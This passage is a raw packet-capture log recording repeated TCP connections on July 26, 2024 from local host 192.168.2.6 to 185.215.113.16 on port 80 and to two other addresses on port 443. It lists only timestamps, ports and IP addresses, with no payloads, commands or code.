Jul 26, 2024 12:57:09.097255945 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097266912 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097285032 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097304106 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097313881 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097322941 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097342014 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097351074 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097369909 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097379923 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097398043 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097408056 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097426891 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097438097 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097460032 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097470999 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097491026 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.097501040 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.097532988 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.101892948 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.101919889 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.101941109 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.101960897 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.101969957 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.101989985 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102000952 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.102018118 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102035046 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102045059 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.102063894 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.102075100 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102092981 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102101088 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.102119923 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.102144957 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.102782011 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102807045 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102828026 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102849960 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102869987 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102890968 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102910995 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102932930 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102953911 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102973938 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.102994919 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103192091 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.103238106 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103257895 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103281021 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.103287935 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103316069 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.103324890 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103341103 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.103353977 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103365898 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.103384972 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103394985 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.103413105 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103423119 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.103440046 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103451014 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.103471041 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103480101 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.103498936 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103508949 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.103527069 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.103537083 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.103565931 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.104186058 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.104206085 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.104227066 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.104238987 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.104248047 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.104266882 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.104275942 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.104294062 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.104304075 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.104322910 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.104341030 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.104357004 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.104367971 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.104386091 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.104397058 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.104414940 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.104424953 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.104444027 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.104454041 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.104470968 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.104499102 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.104512930 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.105003119 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.105019093 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.105045080 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.105056047 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.105067015 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.105083942 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.105093956 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.105112076 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.105120897 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.105139017 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.105149031 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.105169058 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.105179071 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.105206966 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.105796099 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.105844975 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.119319916 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.119369984 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.119388103 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.119429111 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.119446993 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.119472027 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.119482994 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.119482994 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.119482994 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.119482994 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.119498968 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.119522095 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.119566917 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.119605064 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.119709015 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.119723082 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.119731903 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.119781017 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.120014906 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.120034933 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.120055914 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.120079041 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.120110035 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.120131969 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.120146036 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.120163918 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.120181084 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.120187998 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.120204926 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.120212078 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.120228052 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.120235920 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.120250940 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.120275021 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.120877028 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.120918036 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.177520990 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.177614927 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.177731991 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.177751064 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.177764893 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.177778006 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.177787066 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.177805901 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.177824020 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.177875042 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.178057909 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.178088903 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:09.178098917 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:09.178131104 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:10.037878036 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:10.038213968 CEST	60780	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:10.043478966 CEST	80	60779	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:10.043668985 CEST	60779	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:10.043735981 CEST	80	60780	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:10.043812037 CEST	60780	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:10.043934107 CEST	60780	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:10.048748970 CEST	80	60780	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:10.822861910 CEST	80	60780	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:10.822922945 CEST	60780	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:10.929202080 CEST	60780	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:10.929498911 CEST	60782	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:10.934619904 CEST	80	60782	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:10.934691906 CEST	60782	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:10.934895992 CEST	60782	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:10.939938068 CEST	80	60782	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:10.951683044 CEST	80	60780	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:10.951745987 CEST	60780	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:11.145911932 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:11.146003008 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:11.146091938 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:11.162220001 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:11.162233114 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:11.696167946 CEST	80	60782	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:11.697235107 CEST	60782	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:11.755965948 CEST	60782	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:12.053376913 CEST	60782	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:12.154550076 CEST	80	60782	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:12.154582024 CEST	80	60782	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:12.158018112 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.158088923 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.204040051 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.204086065 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.204560995 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.204638958 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.208462000 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.248503923 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.398148060 CEST	80	60782	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:12.398236990 CEST	60782	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:12.507093906 CEST	60782	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:12.507442951 CEST	60784	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:12.512727022 CEST	80	60784	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:12.512860060 CEST	60784	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:12.513112068 CEST	60784	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:12.513154030 CEST	80	60782	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:12.513216019 CEST	60782	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:12.522864103 CEST	80	60784	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:12.665786982 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.665812016 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.665828943 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.666011095 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.666011095 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.666044950 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.666099072 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.755959034 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.756031036 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.756247044 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.756247044 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.756282091 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.756519079 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.757293940 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.757338047 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.757388115 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.757401943 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.757435083 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.757453918 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.757463932 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.757966995 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.757991076 CEST	443	60783	23.192.247.89	192.168.2.6
Jul 26, 2024 12:57:12.758014917 CEST	60783	443	192.168.2.6	23.192.247.89
Jul 26, 2024 12:57:12.806476116 CEST	60785	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:12.806571007 CEST	443	60785	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:12.806665897 CEST	60785	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:12.806919098 CEST	60785	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:12.806952000 CEST	443	60785	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:13.292661905 CEST	80	60784	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:13.293276072 CEST	60784	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:13.293930054 CEST	60784	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:13.298888922 CEST	80	60784	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:13.572582960 CEST	80	60784	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:13.572681904 CEST	60784	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:13.679248095 CEST	60784	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:13.679615974 CEST	60786	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:13.684586048 CEST	80	60786	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:13.684715986 CEST	60786	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:13.684966087 CEST	60786	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:13.688838005 CEST	80	60784	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:13.688930035 CEST	60784	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:13.689807892 CEST	80	60786	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:14.062056065 CEST	443	60785	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:14.062254906 CEST	60785	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:14.077467918 CEST	60785	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:14.077521086 CEST	443	60785	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:14.077729940 CEST	443	60785	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:14.077891111 CEST	60785	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:14.078092098 CEST	60785	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:14.124511957 CEST	443	60785	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:14.506886005 CEST	80	60786	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:14.507106066 CEST	60786	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:14.509496927 CEST	60786	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:14.514549017 CEST	80	60786	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:14.516563892 CEST	443	60785	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:14.516640902 CEST	60785	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:14.516659975 CEST	443	60785	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:14.516714096 CEST	60785	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:14.526736975 CEST	60785	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:14.526767969 CEST	443	60785	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:14.544095039 CEST	60787	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:14.544122934 CEST	443	60787	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:14.544214964 CEST	60787	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:14.544454098 CEST	60787	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:14.544462919 CEST	443	60787	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:14.805335045 CEST	80	60786	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:14.805428982 CEST	60786	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:14.913610935 CEST	60786	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:14.914000988 CEST	60788	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:14.919261932 CEST	80	60788	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:14.919394970 CEST	60788	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:14.919533014 CEST	60788	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:14.919923067 CEST	80	60786	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:14.919991970 CEST	60786	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:14.924845934 CEST	80	60788	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:15.209480047 CEST	443	60787	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:15.209645033 CEST	60787	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:15.210191011 CEST	60787	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:15.210205078 CEST	443	60787	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:15.211783886 CEST	60787	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:15.211796045 CEST	443	60787	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:15.944617033 CEST	80	60788	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:15.944902897 CEST	60788	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:15.945383072 CEST	60788	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:15.947354078 CEST	443	60787	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:15.947422981 CEST	60787	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:15.947449923 CEST	443	60787	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:15.947474957 CEST	443	60787	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:15.947520971 CEST	60787	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:15.947580099 CEST	60787	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:15.947603941 CEST	443	60787	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:15.947890997 CEST	80	60788	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:15.947947025 CEST	60788	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:15.948834896 CEST	60789	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:15.948878050 CEST	443	60789	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:15.948956013 CEST	60789	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:15.949158907 CEST	60789	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:15.949193954 CEST	443	60789	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:15.951962948 CEST	80	60788	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:16.203684092 CEST	80	60788	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:16.203919888 CEST	60788	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:16.339593887 CEST	60788	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:16.339713097 CEST	60790	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:16.344788074 CEST	80	60790	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:16.344894886 CEST	60790	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:16.345596075 CEST	60790	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:16.345781088 CEST	80	60788	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:16.345848083 CEST	60788	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:16.350476980 CEST	80	60790	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:16.709306955 CEST	443	60789	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:16.709500074 CEST	60789	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:16.710057020 CEST	60789	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:16.710063934 CEST	443	60789	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:16.711596012 CEST	60789	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:16.711602926 CEST	443	60789	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:17.191545010 CEST	80	60790	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:17.191705942 CEST	60790	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:17.192511082 CEST	60790	80	192.168.2.6	185.215.113.16
Jul 26, 2024 12:57:17.198005915 CEST	80	60790	185.215.113.16	192.168.2.6
Jul 26, 2024 12:57:17.251734018 CEST	443	60789	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:17.251760960 CEST	443	60789	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:17.251830101 CEST	443	60789	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:17.251883984 CEST	60789	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:17.251919031 CEST	60789	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:17.252408981 CEST	60789	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:17.252476931 CEST	443	60789	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:17.262259960 CEST	60791	443	192.168.2.6	5.75.212.60
Jul 26, 2024 12:57:17.262310028 CEST	443	60791	5.75.212.60	192.168.2.6
Jul 26, 2024 12:57:17.262389898 CEST	60791	443	192.168.2.6	5.75.212.60
